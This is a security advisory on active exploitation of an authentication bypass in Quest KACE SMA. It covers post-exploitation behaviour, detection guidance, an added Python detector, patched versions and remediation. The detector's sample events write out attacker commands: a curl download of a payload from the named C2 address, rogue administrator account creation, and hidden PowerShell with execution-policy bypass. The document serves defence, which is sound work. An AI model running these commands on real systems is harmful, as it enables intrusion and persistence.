Quest KACE SMA flaw CVE-2025-32975 Actively Exploited

Overview

CVE-2025-32975 is a critical authentication bypass vulnerability in the SSO authentication handling of Quest KACE SMA. The root cause is improper validation of authentication tokens or session states during the SSO flow: because the application does not adequately verify them, requests can be processed as if they originated from an authenticated user without any credential check, allowing an attacker to forge or bypass authentication entirely. The attack vector is network-based and requires no privileges, no user interaction, and no prior authentication.

Since Quest KACE SMA serves as a centralized endpoint management platform, successful exploitation gives attackers the ability to deploy software, execute commands, and modify configurations across all managed endpoints.

Active Exploitation

Starting the week of March 9, 2026, Arctic Wolf observed malicious activity in customer environments potentially linked to exploitation of CVE-2025-32975 on unpatched Quest KACE SMA instances publicly exposed to the internet.

Although some affected customers were in the education sector across different regions, Arctic Wolf does not have sufficient data to determine whether that sector was specifically targeted. Given that the exploitation involved internet-exposed appliances, the activity is assessed as likely opportunistic.

Post-Exploitation Activity

Initial access is suspected to have been gained via CVE-2025-32975, with threat actors achieving administrative takeover shortly afterwards. Observed post-exploitation activity included:

  • Exploiting KPluginRunProcess functionality in KACE to execute remote commands
  • Base64-encoded payloads dropped from an external server
  • Files downloaded via curl from 216[.]126[.]225[.]156 to establish C2 communication
  • Additional administrative accounts created via runkbot.exe and added to administrative groups
  • PowerShell executed with Bypass and Hidden flags to modify system registry and enable unauthorized services
  • Credential harvesting using Mimikatz, including one instance disguised as asd.exe
  • RDP access to backup infrastructure (Veeam, Veritas) and domain controllers

No public PoC was available at the time exploitation began. The three related CVEs patched alongside this one — CVE-2025-32976, CVE-2025-32977, and CVE-2025-32978 — were not observed being leveraged in these incidents.

Detection Guidance

Monitor for:

  • Unexpected administrative sessions or logins from unknown IPs in KACE SMA audit logs
  • Anomalous SSO authentication requests without a corresponding identity provider authorization event
  • Administrative actions by users with no matching legitimate login event
  • Account creation activity via runkbot.exe
  • Outbound curl connections from the KACE SMA host
  • Mimikatz execution or renamed variants (e.g., asd.exe)
  • PowerShell with -ExecutionPolicy Bypass -WindowStyle Hidden originating from KACE processes
  • RDP connections from the KACE host to backup servers or domain controllers

C2 IOC: 216[.]126[.]225[.]156
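As an added example (not code from the advisory or from Quest), the following Python applies the endpoint-side items of the guidance above to constructed process-creation events. It assumes that runkbot.exe stands in for "KACE processes", that the agent path shown is illustrative, and that events expose host, parent image, image and command line; the C2 address is the one named above.

```python
import re

# Constructed sample process-creation events (not real telemetry), shaped like 4688/Sysmon fields.
SAMPLE_EVENTS = [
    {"host": "WS01", "parent": r"C:\ProgramData\Quest\KACE\runkbot.exe",          # path is assumed
     "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net user svc_patch Winter2026! /add"},
    {"host": "WS01", "parent": r"C:\ProgramData\Quest\KACE\runkbot.exe",
     "image": r"C:\Windows\System32\net1.exe",
     "cmdline": "net1 localgroup Administrators svc_patch /add"},
    {"host": "WS02", "parent": r"C:\ProgramData\Quest\KACE\runkbot.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -c Get-Service"},
    {"host": "WS02", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -s http://216.126.225.156/x -o C:\Windows\Temp\asd.exe"},
    {"host": "WS03", "parent": r"C:\Windows\explorer.exe",                          # benign control
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
]

KACE_PARENTS = {"runkbot.exe"}   # assumption: runkbot.exe stands in for "KACE processes"
C2_IOC = "216.126.225.156"       # C2 address named in the advisory (defanged there)
# "net user X ... /add" or "net localgroup administrators ... /add"
NET_ADD = re.compile(r"\b(?:user\s+\S+.*\s/add|localgroup\s+administrators\b.*\s/add)", re.I)
# PowerShell accepts any unambiguous prefix of -ExecutionPolicy / -WindowStyle, plus -ep / -w
PS_BYPASS = re.compile(r"-e\w*\s+bypass", re.I)
PS_HIDDEN = re.compile(r"-w\w*\s+hidden", re.I)

def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(event):
    """Return the names of the detection-guidance rules this single event triggers."""
    parent, image, cmd = basename(event["parent"]), basename(event["image"]), event["cmdline"]
    from_kace = parent in KACE_PARENTS
    hits = []
    if from_kace and image in {"net.exe", "net1.exe"} and NET_ADD.search(cmd):
        hits.append("account_creation_via_runkbot")
    if image in {"powershell.exe", "pwsh.exe"} and PS_BYPASS.search(cmd) and PS_HIDDEN.search(cmd):
        hits.append("powershell_bypass_hidden_from_kace" if from_kace else "powershell_bypass_hidden")
    if image in {"curl", "curl.exe"} or C2_IOC in cmd:
        hits.append("curl_or_c2_ioc")
    return hits

def scan(events):
    """Map events to (host, rule) alerts; events that trigger no rule are dropped."""
    return [(e["host"], rule) for e in events for rule in evaluate(e)]
```

Running `scan(SAMPLE_EVENTS)` flags the two account-creation events, the hidden PowerShell launched from runkbot.exe and the curl download, while the benign inventory script produces nothing.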

Affected Versions & Fixes

The vulnerabilities affect Quest KACE SMA through version 14.1 and are resolved in the following versions:

  • 13.0.385
  • 13.1.81
  • 13.2.183
  • 14.0.341 (Patch 5)
  • 14.1.101 (Patch 4)

For 13.x, the security hotfix is available via the support portal and applied under Admin console → Settings → Appliance Updates.

Remediation

  • Patch immediately — this vulnerability has been sitting unpatched in production environments for nearly 10 months
  • Remove KACE SMA from direct internet exposure; restrict remote admin access to VPN only
  • Hunt for rogue admin accounts created via runkbot.exe
  • Rotate all KACE administrative credentials
  • Audit managed endpoint environments for unauthorized software deployments or configuration changes pushed post-compromise
  • Treat any internet-exposed, unpatched KACE SMA instance as potentially compromised — not just vulnerable
